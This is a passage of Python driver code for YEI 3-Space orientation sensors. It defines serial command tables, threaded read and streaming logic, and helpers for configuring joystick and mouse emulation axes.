if callback_func is not None:
callback_func(sensor, False)
else:
# _print("sensor failed to succeed")
pass
val_list[sensor] = success
filter.remove(sensor)
delay += delay_offset
return val_list
def startRecordingData(self, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
sensor.record_data = True
if callback_func is not None:
callback_func(sensor, True)
def stopRecordingData(self, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
sensor.record_data = False
if callback_func is not None:
callback_func(sensor, True)
def debugPrint(self, broadcast_dict):
for sensor, data in broadcast_dict.items():
_print('Sensor {0:08X}: {1}'.format(sensor, data))
class TSCommandQueue(object):
def __init__(self):
self.queue = []
self.return_dict = {}
def queueWriteRead(self, sensor, rtn_key, retries, command, input_list=None):
self.queue.append(("queueWriteRead", sensor, (self.return_dict, rtn_key, retries, command, input_list)))
def queueMethod(self, method_obj, rtn_key, retries, default=None, input_list=None, callback_func=None):
self.queue.append(("queueMethod", (method_obj, rtn_key, retries, default, input_list, callback_func)))
def _queueMethod(self, method_obj, rtn_key, retries, default=None, input_list=None, callback_func=None):
try:
for i in range(retries):
packet = method_obj(*input_list)
if packet is default: # fail_byte
if callback_func is not None:
callback_func(rtn_key, False)
continue
if callback_func is not None:
callback_func(rtn_key, True)
self.return_dict[rtn_key] = packet
break
else:
self.return_dict[rtn_key] = default
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interupt
def createThreads(self):
thread_queue = []
for item in self.queue:
if item[0] == "queueWriteRead":
thread_queue.append(item[1].queueWriteRead(*item[2]))
elif item[0] == "queueMethod":
qThread = threading.Thread(target=self._queueMethod, args=item[1])
thread_queue.append(qThread)
return thread_queue
def proccessQueue(self, clear_queue=False):
thread_queue = self.createThreads()
[qThread.start() for qThread in thread_queue]
[qThread.join() for qThread in thread_queue]
if clear_queue:
self.queue = []
return self.return_dict
# Base class should not be used directly
class _TSBase(object):
command_dict = {
'checkLongCommands': (0x19, 1, '>B', 0, None, 1),
'startStreaming': (0x55, 0, None, 0, None, 1),
'stopStreaming': (0x56, 0, None, 0, None, 1),
'updateCurrentTimestamp': (0x5f, 0, None, 4, '>I', 1),
'setLEDMode': (0xc4, 0, None, 1, '>B', 1),
'getLEDMode': (0xc8, 1, '>B', 0, None, 1),
'_setWiredResponseHeaderBitfield': (0xdd, 0, None, 4, '>I', 1),
'_getWiredResponseHeaderBitfield': (0xde, 4, '>I', 0, None, 1),
'getFirmwareVersionString': (0xdf, 12, '>12s', 0, None, 1),
'commitSettings': (0xe1, 0, None, 0, None, 1),
'softwareReset': (0xe2, 0, None, 0, None, 1),
'getHardwareVersionString': (0xe6, 32, '>32s', 0, None, 1),
'getSerialNumber': (0xed, 4, '>I', 0, None, 1),
'setLEDColor': (0xee, 0, None, 12, '>fff', 1),
'getLEDColor': (0xef, 12, '>fff', 0, None, 1),
'setJoystickAndMousePresentRemoved': (0xfd, 0, None, 2, '>BB', 1),
'getJoystickAndMousePresentRemoved': (0xfe, 2, '>B', 0, None, 1),
'null': (0xff, 0, None, 0, None, 1)
}
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def _setupBaseVariables(self):
self.serial_number_hex = '{0:08X}'.format(self.serial_number)
self.stream_timing = None
self.stream_parse = None
self.stream_slot_cmds = ['null'] * 8
self.stream_last_data = None
self.stream_data = []
self.record_data = False
self.data_loop = False
def _setupProtocolHeader(self, success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
protocol_header = _generateProtocolHeader( success_failure,
timestamp,
command_echo,
checksum,
logical_id,
serial_number,
data_length)
protocol_byte, self.header_parse, self.header_idx_lst = protocol_header
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
if d_header != protocol_byte:
self.f7WriteRead('_setWiredResponseHeaderBitfield', protocol_byte)
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
if d_header != protocol_byte:
print("!!!!!fail d_header={0}, protocol_header_byte={1}".format(d_header, protocol_byte))
raise Exception
def _setupThreadedReadLoop(self):
self.read_lock = threading.Condition(threading.Lock())
self.read_queue = collections.deque()
self.read_dict = {}
self.data_loop = True
self.read_thread = threading.Thread(target=self._dataReadLoop)
self.read_thread.daemon = True
self.read_thread.start()
def __repr__(self):
return "<YEI3Space {0}:{1}>".format(self.device_type, self.serial_number_hex)
def __str__(self):
return self.__repr__()
def close(self):
self.data_loop = False
if self.serial_port:
self.serial_port.close()
self.serial_port = None
self.read_thread.join()
def reconnect(self):
self.close()
if not tryPort(self.port_name):
_print("tryport fail")
try:
serial_port = serial.Serial(self.port_name, baudrate=self.baudrate, timeout=0.5, writeTimeout=0.5)
serial_port.applySettingsDict(self.serial_port_settings)
self.serial_port = serial_port
except:
traceback.print_exc()
return False
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
return True
# Wired Old Protocol WriteRead
def f7WriteRead(self, command, input_list=None):
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf7, None, cmd_byte, packed_data)
self.serial_port.write(write_array)
if out_struct:
output_data = self.serial_port.read(out_len)
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) != 1:
return rtn_list
return rtn_list[0]
# requires the dataloop, do not call
# Wired New Protocol WriteRead
def f9WriteRead(self, command, input_list=None):
global global_counter
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
if self.compatibility < compatibility:
raise Exception("Firmware for device on ( %s ) is out of date for this function. Recommend updating to latest firmware." % self.serial_port.name)
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf9, None, cmd_byte, packed_data)
self.read_lock.acquire()
uid = global_counter
global_counter += 1
try:
self.serial_port.write(write_array) # release in reader thread
except serial.SerialTimeoutException:
self.read_lock.release()
self.serial_port.close()
# _print("SerialTimeoutException!!!!")
# !!!!!Reconnect
return (True, None, None)
except ValueError:
try:
# _print("trying to open it back up!!!!")
self.serial_port.open()
# _print("aaand open!!!!")
except serial.SerialException:
self.read_lock.release()
# _print("SerialTimeoutException!!!!")
# !!!!!Reconnect
return (True, None, None)
queue_packet = (uid, cmd_byte)
timeout_time = 0.5 + (len(self.read_queue) * 0.150) # timeout increases as queue gets larger
self.read_queue.append(queue_packet)
start_time = time.clock() + timeout_time
read_data = None
while(timeout_time > 0):
self.read_lock.wait(timeout_time)
read_data = self.read_dict.get(uid, None)
if read_data is not None:
break
timeout_time =start_time -time.clock()
# _print("Still waiting {0} {1} {2}".format(uid, command, timeout_time))
else:
# _print("Operation timed out!!!!")
try:
self.read_queue.remove(queue_packet)
except:
traceback.print_exc()
self.read_lock.release()
return (True, None, None)
self.read_lock.release()
del self.read_dict[uid]
header_list, output_data = read_data
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
if cmd_echo != cmd_byte:
# _print("!!!!!!!!cmd_echo!=cmd_byte!!!!!")
# _print('cmd_echo= 0x{0:02x} cmd_byte= 0x{1:02x}'.format(cmd_echo, cmd_byte))
return (True, timestamp, None)
rtn_list = None
if not fail_byte:
if out_struct:
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
else:
# _print("fail_byte!!!!triggered")
pass
return (fail_byte, timestamp, rtn_list)
writeRead = f9WriteRead
def isConnected(self, try_reconnect=False):
try:
serial = self.getSerialNumber()
if serial is not None:
return True
except:
pass
return False
## generated functions USB and WL_ and DNG and EM_ and DL_ and BT_
## 85(0x55)
def stopStreaming(self):
fail_byte, t_stamp, data = self.writeRead('stopStreaming')
return not fail_byte
## 86(0x56)
def startStreaming(self):
fail_byte, t_stamp, data = self.writeRead('startStreaming')
return not fail_byte
## 95(0x5f)
def updateCurrentTimestamp(self, time, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('updateCurrentTimestamp', time)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 196(0xc4)
def setLEDMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setLEDMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 200(0xc8)
def getLEDMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getLEDMode')
if timestamp:
return (data, t_stamp)
return data
## 223(0xdf)
def getFirmwareVersionString(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getFirmwareVersionString')
data = convertString(data)
if timestamp:
return (data, t_stamp)
return data
## 225(0xe1)
def commitSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 230(0xe6)
def getHardwareVersionString(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getHardwareVersionString')
data = convertString(data)
if timestamp:
return (data, t_stamp)
return data
## 237(0xed)
def getSerialNumber(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSerialNumber')
if timestamp:
return (data, t_stamp)
return data
## 238(0xee)
def setLEDColor(self, rgb, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setLEDColor', rgb)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 239(0xef)
def getLEDColor(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getLEDColor')
if timestamp:
return (data, t_stamp)
return data
## 253(0xfd)
def setJoystickAndMousePresentRemoved(self, joystick, mouse, timestamp=False):
arg_list = (joystick, mouse)
fail_byte, t_stamp, data = self.writeRead('setJoystickAndMousePresentRemoved', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 254(0xfe)
def getJoystickAndMousePresentRemoved(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickAndMousePresentRemoved')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB and WL_ and DNG and EM_ and DL_ and BT_
class _TSSensor(_TSBase):
command_dict = _TSBase.command_dict.copy()
command_dict.update({
'getTaredOrientationAsQuaternion': (0x0, 16, '>4f', 0, None, 1),
'getTaredOrientationAsEulerAngles': (0x1, 12, '>fff', 0, None, 1),
'getTaredOrientationAsRotationMatrix': (0x2, 36, '>9f', 0, None, 1),
'getTaredOrientationAsAxisAngle': (0x3, 16, '>4f', 0, None, 1),
'getTaredOrientationAsTwoVector': (0x4, 24, '>6f', 0, None, 1),
'getDifferenceQuaternion': (0x5, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsQuaternion': (0x6, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsEulerAngles': (0x7, 12, '>fff', 0, None, 1),
'getUntaredOrientationAsRotationMatrix': (0x8, 36, '>9f', 0, None, 1),
'getUntaredOrientationAsAxisAngle': (0x9, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsTwoVector': (0xa, 24, '>6f', 0, None, 1),
'getTaredTwoVectorInSensorFrame': (0xb, 24, '>6f', 0, None, 1),
'getUntaredTwoVectorInSensorFrame': (0xc, 24, '>6f', 0, None, 1),
'setEulerAngleDecompositionOrder': (0x10, 0, None, 1, '>B', 1),
'setMagnetoresistiveThreshold': (0x11, 0, None, 16, '>fIff', 3),
'setAccelerometerResistanceThreshold': (0x12, 0, None, 8, '>fI', 3),
'offsetWithCurrentOrientation': (0x13, 0, None, 0, None, 3),
'resetBaseOffset': (0x14, 0, None, 0, None, 3),
'offsetWithQuaternion': (0x15, 0, None, 16, '>4f', 3),
'setBaseOffsetWithCurrentOrientation': (0x16, 0, None, 0, None, 3),
'getAllNormalizedComponentSensorData': (0x20, 36, '>9f', 0, None, 1),
'getNormalizedGyroRate': (0x21, 12, '>fff', 0, None, 1),
'getNormalizedAccelerometerVector': (0x22, 12, '>fff', 0, None, 1),
'getNormalizedCompassVector': (0x23, 12, '>fff', 0, None, 1),
'getAllCorrectedComponentSensorData': (0x25, 36, '>9f', 0, None, 1),
'getCorrectedGyroRate': (0x26, 12, '>fff', 0, None, 1),
'getCorrectedAccelerometerVector': (0x27, 12, '>fff', 0, None, 1),
'getCorrectedCompassVector': (0x28, 12, '>fff', 0, None, 1),
'getCorrectedLinearAccelerationInGlobalSpace': (0x29, 12, '>fff', 0, None, 1),
'getTemperatureC': (0x2b, 4, '>f', 0, None, 1),
'getTemperatureF': (0x2c, 4, '>f', 0, None, 1),
'getConfidenceFactor': (0x2d, 4, '>f', 0, None, 1),
'getAllRawComponentSensorData': (0x40, 36, '>9f', 0, None, 1),
'getRawGyroscopeRate': (0x41, 12, '>fff', 0, None, 1),
'getRawAccelerometerData': (0x42, 12, '>fff', 0, None, 1),
'getRawCompassData': (0x43, 12, '>fff', 0, None, 1),
'_setStreamingSlots': (0x50, 0, None, 8, '>8B', 1),
'_getStreamingSlots': (0x51, 8, '>8B', 0, None, 1),
'_setStreamingTiming': (0x52, 0, None, 12, '>III', 1),
'_getStreamingTiming': (0x53, 12, '>III', 0, None, 1),
'_getStreamingBatch': (0x54, 0, None, 0, None, 1),
'tareWithCurrentOrientation': (0x60, 0, None, 0, None, 1),
'tareWithQuaternion': (0x61, 0, None, 16, '>4f', 1),
'tareWithRotationMatrix': (0x62, 0, None, 36, '>9f', 1),
'setStaticAccelerometerTrustValue': (0x63, 0, None, 4, '>f', 2),
'setConfidenceAccelerometerTrustValues': (0x64, 0, None, 8, '>ff', 2),
'setStaticCompassTrustValue': (0x65, 0, None, 4, '>f', 2),
'setConfidenceCompassTrustValues': (0x66, 0, None, 8, '>ff', 2),
'setDesiredUpdateRate': (0x67, 0, None, 4, '>I', 1),
'setReferenceVectorMode': (0x69, 0, None, 1, '>B', 1),
'setOversampleRate': (0x6a, 0, None, 1, '>B', 1),
'setGyroscopeEnabled': (0x6b, 0, None, 1, '>B', 1),
'setAccelerometerEnabled': (0x6c, 0, None, 1, '>B', 1),
'setCompassEnabled': (0x6d, 0, None, 1, '>B', 1),
'setAxisDirections': (0x74, 0, None, 1, '>B', 1),
'setRunningAveragePercent': (0x75, 0, None, 4, '>f', 1),
'setCompassReferenceVector': (0x76, 0, None, 12, '>fff', 1),
'setAccelerometerReferenceVector': (0x77, 0, None, 12, '>fff', 1),
'resetKalmanFilter': (0x78, 0, None, 0, None, 1),
'setAccelerometerRange': (0x79, 0, None, 1, '>B', 1),
'setFilterMode': (0x7b, 0, None, 1, '>B', 1),
'setRunningAverageMode': (0x7c, 0, None, 1, '>B', 1),
'setGyroscopeRange': (0x7d, 0, None, 1, '>B', 1),
'setCompassRange': (0x7e, 0, None, 1, '>B', 1),
'getTareAsQuaternion': (0x80, 16, '>4f', 0, None, 1),
'getTareAsRotationMatrix': (0x81, 36, '>9f', 0, None, 1),
'getAccelerometerTrustValues': (0x82, 8, '>ff', 0, None, 2),
'getCompassTrustValues': (0x83, 8, '>ff', 0, None, 2),
'getCurrentUpdateRate': (0x84, 4, '>I', 0, None, 1),
'getCompassReferenceVector': (0x85, 12, '>fff', 0, None, 1),
'getAccelerometerReferenceVector': (0x86, 12, '>fff', 0, None, 1),
'getGyroscopeEnabledState': (0x8c, 1, '>B', 0, None, 1),
'getAccelerometerEnabledState': (0x8d, 1, '>B', 0, None, 1),
'getCompassEnabledState': (0x8e, 1, '>B', 0, None, 1),
'getAxisDirections': (0x8f, 1, '>B', 0, None, 1),
'getOversampleRate': (0x90, 1, '>B', 0, None, 1),
'getRunningAveragePercent': (0x91, 4, '>f', 0, None, 1),
'getDesiredUpdateRate': (0x92, 4, '>I', 0, None, 1),
'getAccelerometerRange': (0x94, 1, '>B', 0, None, 1),
'getFilterMode': (0x98, 1, '>B', 0, None, 1),
'getRunningAverageMode': (0x99, 1, '>B', 0, None, 1),
'getGyroscopeRange': (0x9a, 1, '>B', 0, None, 1),
'getCompassRange': (0x9b, 1, '>B', 0, None, 1),
'getEulerAngleDecompositionOrder': (0x9c, 1, '>B', 0, None, 1),
'getMagnetoresistiveThreshold': (0x9d, 16, '>fIff', 0, None, 3),
'getAccelerometerResistanceThreshold': (0x9e, 8, '>fI', 0, None, 3),
'getOffsetOrientationAsQuaternion': (0x9f, 16, '>4f', 0, None, 3),
'setCompassCalibrationCoefficients': (0xa0, 0, None, 48, '>12f', 1),
'setAccelerometerCalibrationCoefficients': (0xa1, 0, None, 48, '>12f', 1),
'getCompassCalibrationCoefficients': (0xa2, 48, '>12f', 0, None, 1),
'getAccelerometerCalibrationCoefficients': (0xa3, 48, '>12f', 0, None, 1),
'getGyroscopeCalibrationCoefficients': (0xa4, 48, '>12f', 0, None, 1),
'beginGyroscopeAutoCalibration': (0xa5, 0, None, 0, None, 1),
'setGyroscopeCalibrationCoefficients': (0xa6, 0, None, 48, '>12f', 1),
'setCalibrationMode': (0xa9, 0, None, 1, '>B', 1),
'getCalibrationMode': (0xaa, 1, '>B', 0, None, 1),
'setOrthoCalibrationDataPointFromCurrentOrientation': (0xab, 0, None, 0, None, 1),
'setOrthoCalibrationDataPointFromVector': (0xac, 0, None, 14, '>BBfff', 1),
'getOrthoCalibrationDataPoint': (0xad, 12, '>fff', 2, '>BB', 1),
'performOrthoCalibration': (0xae, 0, None, 0, None, 1),
'clearOrthoCalibrationData': (0xaf, 0, None, 0, None, 1),
'setSleepMode': (0xe3, 0, None, 1, '>B', 1),
'getSleepMode': (0xe4, 1, '>B', 0, None, 1),
'setJoystickEnabled': (0xf0, 0, None, 1, '>B', 1),
'setMouseEnabled': (0xf1, 0, None, 1, '>B', 1),
'getJoystickEnabled': (0xf2, 1, '>B', 0, None, 1),
'getMouseEnabled': (0xf3, 1, '>B', 0, None, 1),
'setControlMode': (0xf4, 0, None, 3, '>BBB', 1),
'setControlData': (0xf5, 0, None, 7, '>BBBf', 1),
'getControlMode': (0xf6, 1, '>B', 2, '>BB', 1),
'getControlData': (0xf7, 4, '>f', 3, '>BBB', 1),
'setMouseAbsoluteRelativeMode': (0xfb, 0, None, 1, '>B', 1),
'getMouseAbsoluteRelativeMode': (0xfc, 1, '>B', 0, None, 1)
})
reverse_command_dict = dict(map(lambda x: [x[1][0], x[0]], command_dict.items()))
_device_types = ["!BASE"]
def __new__(cls, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
if com_port:
if type(com_port) is str:
port_name = com_port
elif type(com_port) is ComInfo:
port_name = com_port.com_port
else:
_print("An erronous parameter was passed in")
return None
if baudrate not in _allowed_baudrates:
baudrate = _baudrate
_print("Error baudrate value not allowed. Using default.")
serial_port = serial.Serial(port_name, baudrate=baudrate, timeout=0.5, writeTimeout=0.5)
if serial_port is not None:
new_inst = super(_TSSensor, cls).__new__(cls)
return _generateSensorClass(new_inst, serial_port, _TSSensor._device_types)
_print('Error serial port was not made')
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this is set the class had been there before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self.callback_func = None
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
self.latest_lock = threading.Condition(threading.Lock())
self.new_data = False
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def _queueWriteRead(self, rtn_dict, rtn_key, retries, command, input_list=None):
try:
for i in range(retries):
packet = self.writeRead(command, input_list)
if packet[0]:
# _print("##Attempt: {0} complete".format(i))
time.sleep(0.1)
continue
rtn_dict[rtn_key] = packet
break
else:
# _print("sensor failed to succeed")
rtn_dict[rtn_key] = (True, None, None)
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interupt
def queueWriteRead(self, rtn_dict, rtn_key, retries, command, input_list=None):
return threading.Thread(target=self._queueWriteRead, args=(rtn_dict, rtn_key, retries, command, input_list))
def _generateStreamParse(self):
stream_string = '>'
if self.stream_slot_cmds is None:
self.getStreamingSlots()
for slot_cmd in self.stream_slot_cmds:
if slot_cmd is not 'null':
out_struct = self.command_dict[slot_cmd][2]
stream_string += out_struct[1:] # stripping the >
self.stream_parse = struct.Struct(stream_string)
# Set streaming batch command
self.command_dict['_getStreamingBatch'] = (0x54, self.stream_parse.size, stream_string, 0, None, 1)
def _parseStreamData(self, protocol_data, output_data):
rtn_list = self.stream_parse.unpack(output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
self.latest_lock.acquire()
self.new_data = True
self.latest_lock.notify()
self.latest_lock.release()
data = (protocol_data, rtn_list)
self.stream_last_data = data
if self.record_data:
self.stream_data.append(data)
if self.callback_func:
self.callback_func(data)
def _dataReadLoop(self):
while self.data_loop:
try:
self._readDataWiredProHeader()
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interupt
except:
# traceback.print_exc()
# _print("bad _parseStreamData parse")
# _print('!!!!!inWaiting = {0}'.format(self.serial_port.inWaiting()))
self._read_data = None
try:
self.read_lock.release()
except:
pass
def _readDataWiredProHeader(self):
_serial_port = self.serial_port
# in_wait = _serial_port.inWaiting()
# if in_wait:
# _print('!666! inWaiting = {0}'.format(in_wait))
header_bytes = _serial_port.read(self.header_parse.size)
if header_bytes:
if self.timestamp_mode == TSS_TIMESTAMP_SENSOR:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader71(header_data)
elif self.timestamp_mode == TSS_TIMESTAMP_SYSTEM:
sys_timestamp = time.clock() # time packet was parsed it might been in the system buffer a few ms
sys_timestamp *= 1000000
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader69(header_data, sys_timestamp)
else:
header_data = self.header_parse.unpack(header_bytes)
header_list = padProtocolHeader69(header_data, None)
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
output_data = _serial_port.read(data_size)
if cmd_echo is 0xff:
if data_size:
self._parseStreamData(timestamp, output_data)
return
self.read_lock.acquire()
if len(self.read_queue): # here for a bug in the code
uid, cmd_byte = self.read_queue.popleft()
if cmd_byte == cmd_echo:
self.read_dict[uid] = (header_list, output_data)
self.read_lock.notify() # dies in 3 seconds if there is a writeRead in wait
else:
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_queue.appendleft((uid, cmd_byte))
self.read_lock.release()
return
# _print('Unrequested packet found!!!')
# _hexDump(header_bytes, 'o')
# _hexDump(output_data, 'o')
self.read_lock.release()
def getLatestStreamData(self, timeout):
self.latest_lock.acquire()
self.new_data = False
self.latest_lock.wait(timeout)
self.latest_lock.release()
if self.new_data:
return self.stream_last_data
def setNewDataCallBack(self, callback):
self.callback_func = callback
def startRecordingData(self):
self.record_data = True
def stopRecordingData(self):
self.record_data = False
def clearRecordingData(self):
self.stream_data= []
# Convenience functions to replace commands 244(0xf4) and 245(0xf5)
def setGlobalAxis(self, hid_type, config_axis, local_axis, global_axis, deadzone, scale, power):
""" Sets an axis of the desired emulated input device as a 'Global Axis'
style axis. Axis operating under this style use a reference vector
and a consitent local vector to determine the state of the device's
axis. As the local vector rotates, it is projected onto the global
vector. Once the distance of that projection on the global vector
exceeds the inputted "deadzone", the device will begin tranmitting
non-zero values for the device's desired axis.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@param local_axis: A list of 3 Floats whose value is a normalized
Vector3. This vector represents the sensor's local vector to
track.
@param global_axis: A list of 3 Floats whose value is a normalized
Vector3. This vector represents the global vector to project the
local vector onto (should be orthoginal to the local vector).
@param deadzone: A float that defines the minimum distance necessary
for the device's axis to read a non-zero value.
@param scale: A float that defines the linear scale for the values
being returned for the axis.
@param power: A float whose value is an exponental power used to
further modify data being returned from the sensor.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
if not self.setControlMode(cntl_class, cntl_idx, 0):
return False
# Create data array
data_array = local_axis + global_axis + [deadzone, scale, power]
# Set data
for i in range(len(data_array)):
if not self.setControlData(cntl_class, cntl_idx, i, data_array[i]):
return False
return True
def setScreenPointAxis(self, hid_type, config_axis, dist_from_screen, dist_on_axis, collision_component, sensor_dir, button_halt):
""" Sets an axis of the desired emulated input device as a 'Screen Point
Axis' style axis. An axis operating under this style projects a
vector along the sensor's direction vector into a mathmatical plane.
The collision point on the plane is then used to determine what the
device's axis's current value is. The direction vector is rotated
based on the orientation of the sensor.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@param dist_from_screen: A float whose value is the real world
distance the sensor is from the user's screen. Must be the same
units as dist_on_axis.
@param dist_on_axis: A float whose value is the real world length of
the axis along the user's screen (width of screen for x-axis,
height of screen for y-axis). Must be the same units as
dist_from_screen.
@param collision_component: A string whose value may be 'X', 'Y', or
'Z'. This string defines what component of the look vector's
collision point on the virtual plane to use for manipulating the
device's axis.
@param sensor_dir: A string whose value may be 'X', 'Y', or 'Z'.
This string defines which of the sensor's local axis to use for
creating the vector to collide with the virtual plane.
@param button_halt: A float whose value is a pause time in
milliseconds. When a button is pressed on the emulated device,
transmission of changes to the axis is paused for the inputted
amount of time to prevent undesired motion detection when
pressing buttons.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
if not self.setControlMode(cntl_class, cntl_idx, 1):
return False
# Create data array
axis_idx = ["X", "Y", "Z"]
data_array = []
data_array.append(dist_from_screen)
data_array.append(dist_on_axis)
collision_component = collision_component.upper()
try:
data_array.append(axis_idx.index(collision_component))
except:
_print("Invalid command for collision_component: {0:s}".format(collision_component))
return False
sensor_dir = sensor_dir.upper()
try:
data_array.append(axis_idx.index(sensor_dir))
except:
_print("Invalid command for sensor_dir: {0:s}".format(sensor_dir))
return False
data_array.append(0)
data_array.append(0)
data_array.append(0)
data_array.append(button_halt)
data_array.append(0)
data_array.append(0)
# Set data
for i in range(len(data_array)):
if not self.setControlData(cntl_class, cntl_idx, i, data_array[i]):
return False
return True
def disableAxis(self, hid_type, config_axis):
""" Disables an axis on the passed in device.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param config_axis: A string whose value may be either 'X' or 'Y'
for a mouse or 'X', 'Y', or 'Z' for a joystick. This string
defines what axis of the device is to be configured.
@return: True if the command was successfuly written to the device.
False if the command was not written.
"""
# Set class
if hid_type != TSS_JOYSTICK and hid_type != TSS_MOUSE:
_print("Invalid command for hid_type: {0:d}".format(hid_type))
return False
cntl_class = hid_type
# Set index
axis_idx = ["X", "Y", "Z"]
if cntl_class == TSS_MOUSE:
axis_idx.pop(-1)
config_axis = config_axis.upper()
cntl_idx = -1
try:
cntl_idx = axis_idx.index(config_axis)
except:
_print("Invalid command for config_axis: {0:s}".format(config_axis))
return False
# Set mode
return self.setControlMode(cntl_class, cntl_idx, 255)
def setPhysicalButton(self, hid_type, button_idx, button_bind):
""" Binds a sensor's physical button to an emulated device's button.
@param hid_type: An integer whose value defines whether the device
in question is a TSS_JOYSTICK or TSS_MOUSE.
@param button_idx: An integer whose value defines which button on
the emulated device to configure. Default range is 0 through 7.
@param button_bind: An integer whose value defines which physical
button to bind to the emulated device's button to as defined by
button_idx, either TSS_BUTTON_LEFT or TSS_BUTTON_RIGHT.
